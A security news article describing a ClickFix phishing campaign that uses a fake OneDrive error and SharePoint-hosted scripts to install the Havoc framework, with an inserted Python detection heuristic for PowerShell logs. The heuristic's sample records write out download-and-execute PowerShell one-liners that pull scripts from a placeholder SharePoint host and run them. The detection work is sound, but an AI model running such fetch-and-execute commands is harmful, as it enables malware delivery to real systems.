Microsoft SharePoint hijacked to spread Havoc malware


  • Security researchers spotted a new ClickFix campaign
  • The goal is to deploy the Havoc post-exploitation framework
  • The framework is hosted on a Microsoft SharePoint account

Hackers have been seen abusing Microsoft SharePoint to distribute the Havoc post-exploitation framework in a new ClickFix phishing attack.

Cybersecurity researchers at FortiGuard Labs, who have been tracking the campaign since last year, note that ClickFix is a type of scam most of us have probably encountered at least once. Cybercriminals hijack a website and add an overlay that displays a fake error message (for example: “Your browser is outdated; to view the contents of the webpage, you need to update it”). That fake message prompts the victim into action, which usually ends with them downloading and running malware, or sharing sensitive information such as passwords or banking data.

This campaign is similar, although it requires a bit more activity on the victim’s side. The attack chain starts with a phishing email carrying a “restricted notice” as an .HTML attachment. Opening the attachment displays a fake error that reads “Failed to connect to OneDrive - update the DNS cache manually”. The page also has a “How to fix” button that copies a PowerShell command to the Windows clipboard and then displays instructions on how to paste and run it.

Rising threat of ClickFix

Running that PowerShell command fetches and runs a second script, hosted on the attackers’ SharePoint server, which in turn downloads a Python script that deploys the Havoc post-exploitation framework as a .DLL file.
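As an added example (not from the article or from FortiGuard's report), the following Python heuristic triages PowerShell script block log text (Event ID 4104) for the chain described above: a download cradle and an execution primitive in the same block, with a sharepoint.com URL and .py/.dll references recorded as supporting context. The log records are constructed for the example and are not real telemetry.

```python
"""Triage PowerShell ScriptBlock text for a download-and-execute chain
(pasted PowerShell -> script on SharePoint -> Python -> DLL)."""
import re

# Constructed sample records (record_id, script block text), not real telemetry.
SAMPLE_EVENTS = [
    # A pasted one-liner that pulls a second-stage script from a SharePoint host
    (1001, r'iwr https://contoso-my.sharepoint.com/personal/u/stage2.ps1 -UseBasicParsing | iex'),
    # The second stage fetching a Python script and handing execution to it
    (1002, r'Invoke-WebRequest https://contoso-my.sharepoint.com/personal/u/r.py -OutFile $env:TEMP\r.py; python $env:TEMP\r.py'),
    # Benign activity: a SharePoint URL on its own is not a download-and-execute
    (1003, r'Get-ChildItem C:\Reports | Where-Object Length -gt 1MB'),
    (1004, r'Start-Process https://contoso.sharepoint.com/sites/hr'),
]

DOWNLOAD = re.compile(r'\b(iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|curl|wget)\b', re.I)
EXECUTE = re.compile(r'\b(iex|Invoke-Expression|Start-Process|python3?|rundll32|regsvr32)\b', re.I)
SHAREPOINT_URL = re.compile(r'https?://[\w.-]*\.sharepoint\.com/\S*', re.I)
STAGED_FILE = re.compile(r'\.(py|dll)\b', re.I)

def score_event(text):
    """Return the list of indicators found in one script block (empty if none)."""
    reasons = []
    if DOWNLOAD.search(text):
        reasons.append('download cradle')
    if EXECUTE.search(text):
        reasons.append('execution primitive')
    if SHAREPOINT_URL.search(text):
        reasons.append('sharepoint.com URL present')
    if STAGED_FILE.search(text):
        reasons.append('python script or DLL referenced')
    return reasons

def is_download_and_execute(reasons):
    """The core signal: remote content fetched and executed within one block."""
    return 'download cradle' in reasons and 'execution primitive' in reasons

def triage(events):
    """Map record_id -> reasons for every record that is a download-and-execute."""
    hits = {}
    for record_id, text in events:
        reasons = score_event(text)
        if is_download_and_execute(reasons):
            hits[record_id] = reasons
    return hits

if __name__ == '__main__':
    for rid, why in triage(SAMPLE_EVENTS).items():
        print(rid, '->', '; '.join(why))
```

The SharePoint and .py/.dll indicators are deliberately context rather than triggers, since legitimate admin activity touches sharepoint.com constantly; only the fetch-and-execute pairing raises a record.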

Havoc is a post-exploitation framework designed for advanced red teaming and adversary simulation, providing modular capabilities for stealthy command and control (C2) operations. It offers features like in-memory execution, encrypted communication, and evasion techniques to bypass modern security defenses.

ClickFix has become hugely popular over the last couple of months. In late October last year, a new malware variant was observed compromising thousands of WordPress websites, installing a malicious plugin that served the ClickFix attack.

Just a few weeks prior, researchers saw fake broken Google Meet calls, which were also a variant of the ClickFix attack.

Via BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
